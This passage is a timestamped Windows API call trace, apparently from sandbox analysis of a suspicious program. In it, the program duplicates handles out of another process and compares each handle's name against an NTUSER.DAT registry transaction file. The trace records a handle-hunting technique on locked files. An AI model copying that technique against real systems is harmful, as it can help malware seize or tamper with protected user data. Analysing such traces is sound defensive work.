[0154.851] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.852] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.852] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.852] CloseHandle (hObject=0x670) returned 1 [0154.852] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.852] CloseHandle (hObject=0x680) returned 1 [0154.853] CloseHandle (hObject=0x62c) returned 1 [0154.853] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.853] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x298, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.853] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.853] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.854] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.854] CloseHandle (hObject=0x670) returned 1 [0154.854] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.854] CloseHandle (hObject=0x680) returned 1 [0154.854] CloseHandle (hObject=0x62c) returned 1 [0154.854] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.854] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.854] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.855] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.856] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.856] CloseHandle (hObject=0x670) returned 1 [0154.856] _wcsicmp (_Str1="\\StaticCache.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.856] CloseHandle (hObject=0x680) returned 1 [0154.856] CloseHandle (hObject=0x62c) returned 1 [0154.856] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.856] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.856] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.861] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.862] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.862] CloseHandle (hObject=0x670) returned 1 [0154.862] _wcsicmp (_Str1="\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.862] CloseHandle (hObject=0x680) returned 1 [0154.862] CloseHandle (hObject=0x62c) returned 1 [0154.862] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.862] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.862] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.863] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.863] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.863] CloseHandle (hObject=0x670) returned 1 [0154.863] _wcsicmp (_Str1="\\comctl32.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0154.864] CloseHandle (hObject=0x680) returned 1 [0154.864] CloseHandle (hObject=0x62c) returned 1 [0154.864] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.864] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.864] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.864] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.865] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.865] CloseHandle (hObject=0x670) returned 1 [0154.865] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.865] CloseHandle (hObject=0x680) returned 1 [0154.865] CloseHandle (hObject=0x62c) returned 1 [0154.865] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.865] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x36c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.865] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.866] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.867] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.867] CloseHandle (hObject=0x670) returned 1 [0154.867] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.867] CloseHandle (hObject=0x680) returned 1 [0154.867] CloseHandle (hObject=0x62c) returned 1 [0154.867] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.867] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x394, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.867] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.868] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.868] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.868] CloseHandle (hObject=0x670) returned 1 [0154.868] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.868] CloseHandle (hObject=0x680) returned 1 [0154.868] CloseHandle (hObject=0x62c) returned 1 [0154.868] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.868] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x404, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.868] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.869] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.871] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.871] CloseHandle (hObject=0x670) returned 1 [0154.871] _wcsicmp (_Str1="\\User Pinned", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 7 [0154.871] CloseHandle (hObject=0x680) returned 1 [0154.871] CloseHandle (hObject=0x62c) returned 1 [0154.871] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.871] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x408, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.871] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.872] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.872] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.872] CloseHandle (hObject=0x670) returned 1 [0154.872] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.872] CloseHandle (hObject=0x680) returned 1 [0154.873] CloseHandle (hObject=0x62c) returned 1 [0154.873] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.873] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x44c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.873] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.873] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.874] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.874] CloseHandle (hObject=0x670) returned 1 [0154.874] _wcsicmp (_Str1="\\Libraries", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0154.874] CloseHandle (hObject=0x680) returned 1 [0154.874] CloseHandle (hObject=0x62c) returned 1 [0154.874] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.874] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x458, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.874] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.875] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.876] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.876] CloseHandle (hObject=0x670) returned 1 [0154.876] _wcsicmp (_Str1="\\Libraries", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0154.876] CloseHandle (hObject=0x680) returned 1 [0154.876] CloseHandle (hObject=0x62c) returned 1 [0154.876] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.876] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x47c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.877] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.877] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.879] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.879] CloseHandle (hObject=0x670) returned 1 [0154.879] _wcsicmp (_Str1="\\User Pinned", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 7 [0154.879] CloseHandle (hObject=0x680) returned 1 [0154.879] CloseHandle (hObject=0x62c) returned 1 [0154.879] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.879] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.879] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.880] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.880] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.880] CloseHandle (hObject=0x670) returned 1 [0154.881] _wcsicmp (_Str1="\\Start Menu", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.881] CloseHandle (hObject=0x680) returned 1 [0154.881] CloseHandle (hObject=0x62c) returned 1 [0154.881] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.881] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.881] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.882] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.882] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.882] CloseHandle (hObject=0x670) returned 1 [0154.882] _wcsicmp (_Str1="\\Start Menu", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.882] CloseHandle (hObject=0x680) returned 1 [0154.882] CloseHandle (hObject=0x62c) returned 1 [0154.882] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.883] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.883] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.883] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.885] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.885] CloseHandle (hObject=0x670) returned 1 [0154.885] _wcsicmp (_Str1="\\Start Menu", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.885] CloseHandle (hObject=0x680) returned 1 [0154.885] CloseHandle (hObject=0x62c) returned 1 [0154.885] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.885] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.885] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.886] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.886] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.886] CloseHandle (hObject=0x670) returned 1 [0154.886] _wcsicmp (_Str1="\\Start Menu", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.886] CloseHandle (hObject=0x680) returned 1 [0154.886] CloseHandle (hObject=0x62c) returned 1 [0154.886] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.886] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x514, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.887] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.887] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.888] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.888] CloseHandle (hObject=0x670) returned 1 [0154.888] _wcsicmp (_Str1="\\Desktop", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -10 [0154.888] CloseHandle (hObject=0x680) returned 1 [0154.888] CloseHandle (hObject=0x62c) returned 1 [0154.888] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.888] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x51c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.888] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.889] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.889] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.889] CloseHandle (hObject=0x670) returned 1 [0154.889] _wcsicmp (_Str1="\\Desktop", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -10 [0154.889] CloseHandle (hObject=0x680) returned 1 [0154.889] CloseHandle (hObject=0x62c) returned 1 [0154.889] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.890] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x524, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.890] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.890] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.891] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.891] CloseHandle (hObject=0x670) returned 1 [0154.891] _wcsicmp (_Str1="\\Desktop", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -10 [0154.891] CloseHandle (hObject=0x680) returned 1 [0154.891] CloseHandle (hObject=0x62c) returned 1 [0154.891] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.891] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x52c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.891] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.892] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.892] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.892] CloseHandle (hObject=0x670) returned 1 [0154.892] _wcsicmp (_Str1="\\Desktop", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -10 [0154.892] CloseHandle (hObject=0x680) returned 1 [0154.892] CloseHandle (hObject=0x62c) returned 1 [0154.892] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.893] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x534, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.893] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.893] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.894] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.894] CloseHandle (hObject=0x670) returned 1 [0154.894] _wcsicmp (_Str1="\\Burn", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -12 [0154.894] CloseHandle (hObject=0x680) returned 1 [0154.894] CloseHandle (hObject=0x62c) returned 1 [0154.894] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.894] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x53c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.894] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.895] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.895] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.895] CloseHandle (hObject=0x670) returned 1 [0154.896] _wcsicmp (_Str1="\\Burn", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -12 [0154.896] CloseHandle (hObject=0x680) returned 1 [0154.896] CloseHandle (hObject=0x62c) returned 1 [0154.896] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.896] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.896] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.896] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.897] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.897] CloseHandle (hObject=0x670) returned 1 [0154.897] _wcsicmp (_Str1="\\wdmaud.drv.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0154.897] CloseHandle (hObject=0x680) returned 1 [0154.897] CloseHandle (hObject=0x62c) returned 1 [0154.897] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0154.897] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.897] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.898] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.899] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.899] CloseHandle (hObject=0x670) returned 1 [0154.899] _wcsicmp (_Str1="\\MMDevAPI.dll.mui", 